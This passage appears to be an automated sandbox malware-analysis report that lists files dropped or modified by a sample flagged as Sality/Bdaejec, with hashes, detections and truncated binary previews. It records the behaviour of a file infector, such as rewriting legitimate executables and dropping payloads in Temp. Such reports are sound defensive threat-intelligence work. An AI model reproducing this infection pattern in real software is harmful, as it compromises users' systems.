                            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exea4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
                              aspweb.exeGet hashmaliciousSalityBrowse
                                aspweb88.exeGet hashmaliciousUnknownBrowse

                                  Created / dropped Files

                                  C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):6.591070226190889
                                  Encrypted:false
                                  SSDEEP:384:1FzSrXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:WlQGPL4vzZq2o9W7GsxBbPr
                                  MD5:DB3CF007FDE989AA8497D84C84A64C54
                                  SHA1:66708BF9AB6B71C2817351C1807ECBE2E18EC679
                                  SHA-256:6F0DD666EB89CF2D62DC4A98440A178B7EF38A095F5231062CAD4CEAC0E3C690
                                  SHA-512:E489BE5581B56FF4857A8DDDEEFFB95FF0F23CD87C28DBEA94979AFBFFC1B93690D7EF304F76B3C47B49B285B599582876DBF48C607C1C888C85C9AEC1596A4C
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                                  C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:modified
                                  Size (bytes):2389504
                                  Entropy (8bit):6.731346177851746
                                  Encrypted:false
                                  SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                  MD5:B45FB91E1DE9F85CEB24ED0BE3351E30
                                  SHA1:397178D2FBBA12C606B0AE31B8861F82347671F5
                                  SHA-256:1E0166727729FCC5411245DEA917360D6252B4AE5871378B539D811B1A27CEBB
                                  SHA-512:D371DC73B18448F1CFA7A8A6513973416C9690DDAE59F6E6146D629155025469C6625A8E39A3C0F6471F460A59DD3A5F690C39490378037E704E508CCA48092D
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

                                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):4210216
                                  Entropy (8bit):6.5030627280414235
                                  Encrypted:false
                                  SSDEEP:49152:4pawZh+vD5oLv9eqJ/iUPnspBu/MLPgyLMLQB4gQDyJ0ryMOAqk9l/hO2y/BA:xehFLvTQDpB5oSOmlBm
                                  MD5:69222B8101B0601CC6663F8381E7E00F
                                  SHA1:DC1F4774F3104DEA6A50646D6C11EFEFD2A29169
                                  SHA-256:F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
                                  SHA-512:03493D5105A3A0E8C95E6E0AC8D7F814FF075FE9D36C389067E021D55B4D75CA3BDD4D688EFA9B00D8A5E84513FF99774C2A4C9B30CC89FB8FF94154BFEB32A9
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                  • Filename: aspweb.exe, Detection: malicious, Browse
                                  • Filename: aspweb88.exe, Detection: malicious, Browse
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................A......<A...`..........................................'3......+3.P.....8......P6..e....@.((....A. 1..h.2.T.....................2.(...P"-.@............33.......3. ....................text...E.,.......,................. ..`.rdata..$#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc.........8.......6.............@..@.reloc.. 1....A..2....?.............@..B........................................................

                                  C:\Program Files\7-Zip\Uninstall.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):31744
                                  Entropy (8bit):6.366522990138874
                                  Encrypted:false
                                  SSDEEP:768:uWQ3655Kv1X/qY1MSdIxQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdI2GCq2iW7z
                                  MD5:6FE5222A003F3E4177F7C5BD7E8B0736
                                  SHA1:7BB801FB9D05DE3CA10DF14062939C33D68E62ED
                                  SHA-256:1C7125A25D7752101BC5092697E9AFFC24C49D7C9A6A6F5345EC573E3C8388D9
                                  SHA-512:6790CC7BF588ED4F7513646C233F5A81F0C4F30E83C7E09D9A5953DB38BD381EC5A5BD906325D42360F6C733FE7FA0D27AEE79FF1E59D94AD4D5C50FFD3BDFBD
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\k1[1].rar

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.

                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk

                                  Download File
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):8192
                                  Entropy (8bit):0.6483774055598415
                                  Encrypted:false
                                  SSDEEP:48:VDiwZD9iwZDaCk2L4izDiwZD9iwZDaCk2L4i:1iY9iY1kMNiY9iY1kM
                                  MD5:6240E4A55CE1298152DDA378F9B0DBA2
                                  SHA1:8F43CDAFF641670E5E8C9B9B942B49C4AC03BD6A
                                  SHA-256:8A9CD303B64A10935F49D4DD7930CCA6181C323A585822266D5DCF7E844ECF36
                                  SHA-512:315AEB8B9693534A103BC20FE610D02EAE6FBE3CAD6726E47823DE2E1302AC88545F58DA44BD9EA58A255FC4CF151B25C84007C3E7667E6BE9B1D8E23D5E8F92
                                  Malicious:false
                                  Preview:..?e...................';...{-.................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...............................................................................................................................................................................................................0u........................................................................................................... ..t.......S.......h.m.......k......X.2';...{k.................C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t......................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log

                                  Download File
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):524288
                                  Entropy (8bit):0.525971698026289
                                  Encrypted:false
                                  SSDEEP:768:pX0CgFkARixmBG/mjv5I83KVFInQCWldALnbaaPyqv1RpnF7MmbR2:pXhOvjvPZ5PJX
                                  MD5:10B55D67F9EEAF1D5096246541E8B310
                                  SHA1:026D9DC530586E487A03B882C03FA739F494D723
                                  SHA-256:0D46C804C4B5A3EF28EC967E8181E03563C14177216782CAAF5CB61ADB9F4443
                                  SHA-512:6727CD4C9561E43F1158B31681C745CAA7F011E372843828AD09FA203645DF8982A73162FF662D3EEE15639DE1A3BC85C681AD9E284F659E975221788DF64717
                                  Malicious:false
                                  Preview:);#..................|}......{E.........<......';...{-.................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...............................................................................................................................................................................................................0u.............................................l...........U.$.!.!.#......... ..........S.......h.m.......k......X.2';...{k.................C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t..............................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V0100005.log

                                  Download File
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:OpenPGP Secret Key
                                  Category:dropped
                                  Size (bytes):524288
                                  Entropy (8bit):5.854861002272465
                                  Encrypted:false
                                  SSDEEP:6144:L5lFsSImQNIi46kVE7x6mEgIxuqSWWBDWpCHr:g4mp+sR
                                  MD5:68E1F7CFF577FCAB452478E81DBAF85B
                                  SHA1:1BD0552F28B74EDADA3970C29830B64F87CED749
                                  SHA-256:7C3163EF2DA61FF23F1DB54411EDD87C9EEFBD9DE0431BE2AE8375FEBA636173
                                  SHA-512:384B2404521A4AD8E3BE11535887DE5C873F06B57077A520FB3D95A9926ADEADEF143575BCB809CCED0EE54BDFC66E7B08165BB3BD9E4DAE35A22BCE19CE046D
                                  Malicious:false
                                  Preview:.....................{E......{..........<......';...{-.................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..............................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...............................................................................................................................................................................................................0u........................................................M6....[i.#......... ..(.......S.......h.......6........X.2';...{k.................C.:.\.U.s.e.r.s.\.t.i.n.a.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t..............................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

                                  Download File
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xed5f7e20, page size 32768, DirtyShutdown, Windows version 10.0
                                  Category:dropped
                                  Size (bytes):16252928
                                  Entropy (8bit):0.9724942679462584
                                  Encrypted:false
                                  SSDEEP:6144:woTl5eo1CKGP5q/XiE4L5E8NP//Xsx0BnNP//Xsx0Bn695nu8eX8e58ekpjX8evO:ahngFrVo90FdLhVKsKQn19
                                  MD5:5B1F5C560CEA058B0FAE9559C06071B9
                                  SHA1:A38FA6A7F75DFDD91962C97320869B908105BBD5
                                  SHA-256:B08B22C6E41DB8C0D2DD634C4C399B6F6A1A87A0DB07E1D08FE833B21C028F4A
                                  SHA-512:E972DE792A33E2D6FCF64B371D83B6D9A5D5CF9AE6964DF989D1C9E2291562175B6471653821DDDBD9376B33CC9ABD015E6D1F302CAE0F4DE3D6B97237D66CAF
                                  Malicious:false
                                  Preview:._~ ... .......4........X.2';...{k.......................k..........{..6....|..h.m............................';...{-.............................................................................................S...........eJ......n........................................................................................................... ............|}..................................................................................................................................................................................................{E...................................I.#....|...................t"....|k..........................#......h.m.....................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

                                  Download File
                                  Process:C:\Windows\System32\dllhost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):0.12994162714006957
                                  Encrypted:false
                                  SSDEEP:6:S8Yffi3lL0UMJl4aeB2oMOSlbQqO+0CqAvQ/:0K3l4UMJBiMRlbn+YvQ/
                                  MD5:16A2F2CC9DD86BFEFFDED8AC748F07FB
                                  SHA1:8E3E40925074143EB617FE6E7EC12604E2AFFD61
                                  SHA-256:AD24719214A7FED21DF65CD2B0E9DFA9616CC3FE13BC77A2DFB97420D24E6AB2
                                  SHA-512:AE5D1527414F46C5CA9509C407994BEFEA565D1267C2781089DF01E2DFE4FE92E99E914870EC7CF15BD97809C6232CA2E8F8E54943368A0FD67A3082518E6DFE
                                  Malicious:false
                                  Preview:..j.....................................';...{k.6....|.......{..........8....|_.4....|'...I.#....|...................L.8....|_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                                  Download File
                                  Process:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):1.8841901816926478
                                  Encrypted:false
                                  SSDEEP:96:wJB3l4uvE6OtBqxYrHYM0vxZ244SSP2KxkxT:kBVJvE6OtISCjOHC
                                  MD5:6259EEB6231167CEA1302C7533D6E912
                                  SHA1:B357438E20E4C707809E534C1733F9701D014CF6
                                  SHA-256:951CE40E89E3C7198386B5B274FDA1CEF871077AFDF6A06BABD863FA3788CB22
                                  SHA-512:2EC59371CE39C7B51198EE5A15192F3466259181143B62EC84D3CD1BC7D6C1671C0A1806E176339056A0B0774CEDE0FDB6712C8AEE5DD0B53FDE63A074EF098F
                                  Malicious:false
                                  Preview:regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm".................................................................................................................................................................................................................................................................................................................................................;.h"........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1

                                  Download File
                                  Process:C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):8192
                                  Entropy (8bit):1.9894255761207573
                                  Encrypted:false
                                  SSDEEP:48:LJCNjE876IhF74c5v6gJkAEm/mtAYsNFUr+dSaYefl6tcHktnVAnfFpN+:LJCNd3l4uvE6OtBqxYrHYM
                                  MD5:5C079C84A186E8B1961032E64C3DC354
                                  SHA1:21EB01E3B82B6F488001E762B7A8BAFE593C269C
                                  SHA-256:3A4A608653ED59005D4086D03C3AEC1709F7FE2081092952BBCE28BCE0F752EF
                                  SHA-512:677614960C32A6B2C05EEFCCC07FC5749AE229F593D1557A5FD9E5E2E7CAEF9877E045869712F4015D50452A1C9E5F647AB5DE7B9D79FBE3652F187C6A9AC09F
                                  Malicious:false
                                  Preview:regf........b.Q.7.................. ....0......1.h.2.t.x.y.e.w.y.\.S.e.t.t.i.n.g.s.\.s.e.t.t.i.n.g.s...d.a.t...y..j.....J.....y..j.....J.........z..j.....J.....rmtm".................................................................................................................................................................................................................................................................................................................................................<.h"HvLE.............0.......wb.c.z..s...........hbin................b.Q.7..........nk,.T...7..................................x...............................Test....p...sk..h...h.......t.......H...X.............4.........?.......................?....................... ... ...............YQ..fr]%dc;.............vk......0...........PeekBadges..........[.]....|.........................JJG.k...ey ........p...sk..x...x.......t.......H...X.............4.........?.......................

                                  C:\Users\user\AppData\Local\Temp\0FBF2996.exe

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.

                                  C:\Users\user\AppData\Local\Temp\YMZwp.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):15872
                                  Entropy (8bit):7.031113762428177
                                  Encrypted:false
                                  SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                  MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                  SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                  SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                                  SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 100%
                                  Joe Sandbox View:
                                  • Filename: a4#Uff09.exe, Detection: malicious, Browse
                                  • Filename: 1.0.0.2.exe, Detection: malicious, Browse
                                  • Filename: log1.exe, Detection: malicious, Browse
                                  • Filename: log2.exe, Detection: malicious, Browse
                                  • Filename: 2.exe, Detection: malicious, Browse
                                  • Filename: gracNYJFpD.exe, Detection: malicious, Browse
                                  • Filename: xpKZwKFN9W.exe, Detection: malicious, Browse
                                  • Filename: LVF7FM9Z4I.exe, Detection: malicious, Browse
                                  • Filename: hJSrJRHret.exe, Detection: malicious, Browse
                                  • Filename: KFt0cactum.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\aoah.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\atji.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\bdje.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....

                                  C:\Users\user\AppData\Local\Temp\bhkdfd.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\bhwg.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\bvqi.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\dcxg.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.

                                  C:\Users\user\AppData\Local\Temp\djdnr.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
